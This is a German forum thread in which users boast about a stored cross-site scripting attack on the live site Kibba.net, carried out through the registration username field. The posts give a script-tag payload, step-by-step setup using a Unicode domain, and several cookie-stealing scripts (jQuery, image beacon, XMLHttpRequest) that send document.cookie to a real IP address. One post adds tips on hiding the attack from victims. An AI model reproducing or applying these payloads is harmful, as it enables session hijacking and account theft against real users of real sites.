- Offizieller Beitrag
Unterlasst die Ausdrücke und ich lass den Thread offen.
Weitere Beleidigungen und Flames werden mit einer Verwarnung bestraft.
Kibba.net - Stored XSS
-
-
-
So Mission Completed.
Payload:
<script src=//1223.gq/></script>
Es wird eine JavaScript Datei ausgeliefert.
Sie wird auch ausgeführt. POC Video folgt:Externer Inhalt www.youtube.comInhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.P.S: THX An die Seekuh Crew für die Verkürzung von dem src=//
-
Noch schnell window.onload = function(){} und/oder n iframe ins Script und das Opfer merkt es nicht mal.
-
Wollte eigentlich ein AJAX gequest machen. War bei mir leider noch in der Browser Cache. Ansonsten hier mein JS Code:
JavaScriptalert("Hacked by FatalSec ;)"); $( document ).ready(function() { $.get( "http://5.230.225.107/bg.php", { cookie: document.cookie } ); }); -
Alles anzeigen
So, da Fatality zu schlecht im Hacken ist und keine Ahnung vom Internet hat, werde ich ihm nun alle Schritte noch ein mal hier erklären:
1.
Man kauft sich eine x.co Domain, das x kann hier irgendein Unicode-Zeichen sein, davon gibts ja genug.
Wollen wir nun z.B. 看 haben, dann müssen wir uns xn--c1y.co kaufen. Diese Domain kann man dann per 看.co aufrufen.2.
Man registriert sich bei Kibba mit folgendem Namen: <script src=//看.co></script>3.
Nun muss man beim seinem Server (der hinter 看.co liegt), den Webserver so einstellen, dass er die gewünschte JS-Datei als Index sendet. Hier muss man darauf achten, dass der Content-Type application/javascript ist.4.
Nun hat man ein externes Script eingebunden, ohne dass die Seite kaputt geht.FatalSecurity wurde hiermit offiziell Z E R S T Ö R T von der Seekuh Crew!
Tja man keine solche Zeichen beim Kibba leider nicht verwenden
-
den witz vesteh ich nicht.
-
Hier ist der script kleiner gemacht
<script>alert('irgendwas am besten 1 Zeichen');</script>
Hab noch eines erstellt 3min später waren wartungsarbeiten xD.
-
Hier ist der script kleiner gemacht
<script>alert('irgendwas am besten 1 Zeichen');</script>
Hab noch eines erstellt 3min später waren wartungsarbeiten xD.
Haben wir schon gepostet
Siehe
Seite 1 letzer Beitrag. -
Konnte man wohl
Die checken die Namen nicht, falls du es noch nicht bemerkt haben solltest.Aber ist OK, Fatality! Ist schwer zu verkraften, so zerstört zu werden 
Natürlich checken sie den Namen, sonst würd's keine Zeichenbegrenzung geben.
-
Natürlich checken sie den Namen, sonst würd's keine Zeichenbegrenzung geben.
Ja, sie checken die Länge aber nicht welche Zeichen drin sind. Wieso sollte sonst <,/," usw. gehen?
-
Die Moderatoren greifen schon echt hart durch.
Das Thema langweilt mich, ich werde nur noch auf konstruktive Meinungen ohne Beleidigungen antworten. Danke.
Ich bin mal draußen. -
Warum den .js kram mit jQuery etc?
Geht doch so viel einfacher und ohne redirect:Codevar x = document.createElement("img"); x.src = "http://host/script.php?_=" + encodeURIComponent(btoa(document.cookie)); x.style.position = "absolute"; x.style.left = -10000; x.style.top = -10000;Code by Seekuh Crew ( @klinker_)
-
Wollte eigentlich ein AJAX gequest machen. War bei mir leider noch in der Browser Cache. Ansonsten hier mein JS Code:
JavaScriptalert("Hacked by FatalSec ;)"); $( document ).ready(function() { $.get( "http://5.230.225.107/bg.php", { cookie: document.cookie } ); });Hier hast du deine Antwort. Nettes Script von dir.
Wenn du das Script im Zitat analysierst, wirst du erkennen das ich einfach ein AJAX (GET METHODE) mit dem Cookie gesendet habe.
Du hast es natürlich professioneller gemacht. Base64 encode usw, aber besser wäre es einfach mit AJAX gewesen. Ist schneller und ist kürzer.
Habe jQuery benutzt da die Bibliothek dort benutzt wurde, und kürzer ist.
-
Hier hast du deine Antwort. Nettes Script von dir.
Wenn du das Script im Zitat analysierst, wirst du erkennen das ich einfach ein AJAX (GET METHODE) mit dem Cookie gesendet habe.Du hast es natürlich professioneller gemacht. Base64 encode usw.
Hast du meine Frage gelesen? "mit jQuery etc"
Was machst du denn wenn die Seite kein jQuery benutzt?gg.
-
Ich finde es ja faszinierend das ihr einem so kleinen Retro
so viel Aufmerksamkeit schenkt.
Naja wenn ihr Spaß dran habt irgendwelche Befehle zu verwenden, mich juckts nicht.Peace,
Der Antimate -
@ECB2
. Seite neuladen. Sonst nochmal.Ich habe jQuery benutzt, weil es kürzer ist. Die Bibliothek war ja bereits eingebunden also sah ich da kein Problem es auch zu benutzen.
Wenn keine jQuery Bibliothek eingebunden ist benutzt man eben rohes JavaScript.
Ist ja einfach
Codevar ajax = new XMLHttpRequest(); ajax.open("GET", "http://5.230.225.107/bg.php?cookie=" + encodeURIComponent(document.cookie, true)); ajax.send(); // Dieses Script ist ungetestet. Nur aus dem Kopf. -
@ECB2
. Seite neuladen. Sonst nochmal.Ich habe jQuery benutzt, weil es kürzer ist. Die Bibliothek war ja bereits eingebunden also sah ich da kein Problem es auch zu benutzen.
Wenn keine jQuery Bibliothek eingebunden ist benutzt man eben rohes JavaScript.
Ist ja einfach Codevar ajax = new XMLHttpRequest(); ajax.open("GET", "http://5.230.225.107/bg.php?cookie=" + encodeURIComponent(document.cookie, true)); ajax.send(); // Dieses Script ist ungetestet. Nur aus dem Kopf.Darf ich fragen was das für eine IP ist?
Peace,
Der Antimate -
Es gibt so viele bessere Methoden als nur Cookies zu klauen! Dafür muss man sich aber ein bisschen mit Javascript auskennen
(Kleiner Hacking Tipp von Seku Crew, kein OT) -
@klinker_ Mit JavaScript lässt sich viel machen. Ein Grund wieso die Betreiber eine Cross site scripting Lücke fixen sollten, ist die Sicherheit der Benutzer.
Wenn man Cookies stealt läuft der User in Gefahr gehackt zu werden.
Man könnte auch mit JavaScript eine Datei downloaden lassen.
Man kann sehr viel machen mit JavaScript.
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!